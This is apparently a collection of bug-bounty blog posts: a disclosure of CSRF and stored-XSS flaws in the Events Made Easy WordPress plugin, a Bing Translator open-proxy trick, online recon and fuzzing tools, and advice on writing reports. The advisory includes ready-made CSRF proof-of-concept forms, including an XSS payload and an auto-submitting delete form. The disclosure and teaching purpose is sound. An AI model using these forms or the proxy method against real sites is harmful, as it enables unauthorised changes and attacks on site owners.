Check it out http://joomlatest.securelayer7.net/
I want to share a interesting reading that I noticed when searching Mr. G for Ruby security.
I still didn’t finished reading it because lack of time but this weekend this will be on my to-do list.
I would like describe a step-by-step of my latest “appreciation program” reward on a security issue in a WordPress plugin.
First things first – check if the blog is in-scope of the program. If it is, continue to read this article. If not, you can just see my other tips about #bugbounty (here and here).
I’m a big fan of WPScan. It’s a great Ruby tool to scan a WordPress installation. It uses a black box approach but still a must use in my opinion.
WPScan didn’t find any real security issue on my target but showed me the list of plugins used:
ruby wpscan.rb –url www.target.com –enumerate p
So I picked one by one to search for open vulnerabilities or something interesting on their changelog. Nothing…
I needed to start auditing them.
I picked Events Made Easy plugin and installed it on my local box. The plugin is quite simple and I noticed that nonce WordPress security token or any other form protection was missing in some places [when auditing the source-code]. Also some of the variables were not sanitized so I could attack it with a CSRF and a Persistent XSS.
I started creating a proof-of-concept based on my findings – check the advisory.
I reported the security issue to the “appreciation program”, vendor and requested a CVE reference.
So my steps were:
Small tip: Sometimes even a full disclosure can get you a small bounty 🙂 https://cobalt.io/nexmo/reports/15
This method is already known on many other servers like Google Translator and other online services.
I don’t know if I might consider this to be a security issue. Let’s call it a special Bing Translator feature 🙂
Using Bing Translator service anyone can use their IP addresses as a proxy. Malicious users could use this method as a plataform to launch web attacks like (xss, sql injection, etc). Also users could use this service to visit blocked sites.
I noticed that on my webserver logs that I had two requests made by 126.96.36.199 [msnbot-157-56-2-63.search.msn.com]
Other example to show the IP of the user (ip.php just shows $_SERVER[“REMOTE_ADDR”]):
I notice that if you make both languages in the same pair (i.e., en-en for English to English), the translation is effectively skipped but the requested web content is still served from Microsoft servers.
Google in the past had the same issue. They fixed the pair issue part to prevent misuse of their translation service. Now in Google Translator you always need to choose a different language every time.
Plugin link: https://wordpress.org/plugins/events-made-easy/
Active Installs: 10,000+
Version tested: 1.5.49
CVE Reference: Waiting
Events Made Easy is a full-featured event management solution for WordPress. Events Made Easy supports public, private, draft and recurring events, locations management, RSVP (+ optional approval), Paypal, 2Checkout, FirstData and Google maps. With Events Made Easy you can plan and publish your event, or let people reserve spaces for your weekly meetings. You can add events list, calendars and description to your blog using multiple sidebar widgets or shortcodes; if you are a web designer you can simply employ the template tags provided by Events Made Easy.
When playing around with this plugin I noticed a couple of vulnerabilities. In my opinion they are critical because they can could cause damage to a WordPress installation.
All of them are related to CSRF where the vendor forgot to place a security token (wp_nonce) on the affected forms.
#1 Add template CSRF + Persistent XSS
If a authenticated admin clicks on the “Add template” button on a html with this code:
<form action="https://victims_website/wp-admin/admin.php?page=eme-templates" method="POST"> <input type="hidden" name="eme_admin_action" value="do_addtemplate" /> <input type="hidden" name="description" value="<svg/onload=confirm(1)>" /> <input type="hidden" name="format" value="csrf" /> <input type="submit" name="submit" value="Add template" /> </form>
It will add a Persistent XSS vector on the template description field. This field is automatically executed when the admin visits the page admin.php?page=eme-templates.
Possible attack scenario:
#2 Add Form Field CSRF + Persistent XSS
If a authenticated admin clicks on the “Add field” button on a html with this code:
<form action="https://victims_website/wp-admin/admin.php?page=eme-formfields" method="POST"> <input type="hidden" name="eme_admin_action" value="do_addformfield" /> <input type="hidden" name="field_name" value="<svg/onload=confirm(1)>" /> <input type="hidden" name="field_type" value="1" /> <input type="hidden" name="field_info" value="csrf" /> <input type="hidden" name="field_tags" value="csrf" /> <input type="submit" name="submit" value="Add field" /> </form>
Like vulnerability #1 the attack scenario is the same. Same issue affects form fields on this plugin.
#3 Remove events older than CSRF
With this CSRF a malicious user could delete all the events older than a certain number.
In my proof of concept I used a auto-submit form that could also be used in vulnerabilities #1 and #2.
<form action="https://victims_website/wp-admin/admin.php?page=eme-cleanup" name="dsopas" method="POST"> <input type="hidden" name="page" value="eme-cleanup" /> <input type="hidden" name="eme_admin_action" value="eme_cleanup" /> <input type="hidden" name="eme_number" value="1" /> <input type="hidden" name="eme_period" value="day" /> <input type="hidden" name="doaction" value="Apply" /> </form> <script> document.dsopas.submit(); </script>
Possible attack scenario:
I’m getting a few emails asking some tips on how to get some bounties. Because I like to help others and I’m a share knowledge believer 🙂 I wrote this small article about using the right online tools and earn some bucks on bounty programs.
Most experience bug hunters already know most of this tools but this is mostly for starters.
Qualys provides a free online tool that runs a complete test on a target SSL. Heartbleed, OpenSSL CCS vuln, BEAST, POODLE, etc all of these are covered in this online test.
Missing SPF? Let’s test it…
These tools are meant to help you check SPF records on your target. For many bug bounties participants this is one of the first things to try. Usually get’s the minimum payout if in-scope. On HackerOne, Shopify already paid $500 on this missing email security header – https://hackerone.com/reports/54779
Find subdomains of a domain
pentest-tools.com offers 40 credits every day to a user for free and using this information gathering information on the subdomains will take you 20 credits so you can use it twice a day. This is very usefull to find other domain targets.
With only 10 credits [you have 40 credits every day] this online URL Fuzzer can be used to find hidden files and directories on a web server.
This is a discovery activity which allows you to discover resources that were not meant to be publicly accessible (ex. /backups, /index.php.old, /archive.tgz, /source_code.zip, etc).
With a file/direcotry fuzzer you can always find interesting stuff. I already found a couple of phpinfo.php files on major companies and got few bounties with them.
With this online you get a overview of the Drupal version used, template name, if directory indexing is enabled, etc. Some of this information you could use to run further tests and determine if you can get someting vulnerable from the Drupal instalation.
I’m a big fan of wp-scan but if you need a free online tool HackerTarget will do a good job for you.
This tool will check the version of WordPress, check directory indexing, list plugins [and if new updates are available], user enumeration, etc. With this information you can check for vulnerable plugins and provide a good report about that.
Like the previous tools this one also checks for Joomla instalattions information. Take a look into the plugins/components. Usually there are something to look for. Compare versions and Google for changelogs about vulnerabilities. Very often in the changelog the vulnerability is not public but if it says CSRF on options-windows.php. Just try to download that version and audit it yourself. I’ll do that 🙂
Target store using Magento?
Scan your targets Magento shop for known security vulnerabilities. This is a very useful tool that can get a few vulnerabilities in your bounty quest.
I would like to add that there are better tools that could be installed on your operating system but that could be on another article 🙂
Tip 1: Always read carefully the bounty program details to check what’s in-scope. Always respect the rules.
Tip 2: Don’t forget also to read my article. Don’t copy paste your online results on the report and voila!
As a bug hunter at Cobalt, HackerOne and BugCrowd I always try do my best to give programs the best information needed to understand the security report.
Sometimes I notice that some public disclosures on HackerOne have just two or three paragraphs like:
You guys don’t have SPF header on your mail server.
Check it online here: …
If I was the program manager I would categorize this like “WTF” bug or something. Not for the vulnerability itself but because the lack of information and effort by the bug hunter. You need to sell your service. You need to show the program that you care and you know what you are talking about. Treat the program like your client.
Sometimes this make the difference between earning kudos and earning money.
Elaborate the security vulnerability as much as possible and describe possible attack scenarios. Screenshots and videos are always a bonus.
Also show the “client” clear solutions for their problem.
Hey this is just a small tip… Hope it makes difference on your future reports!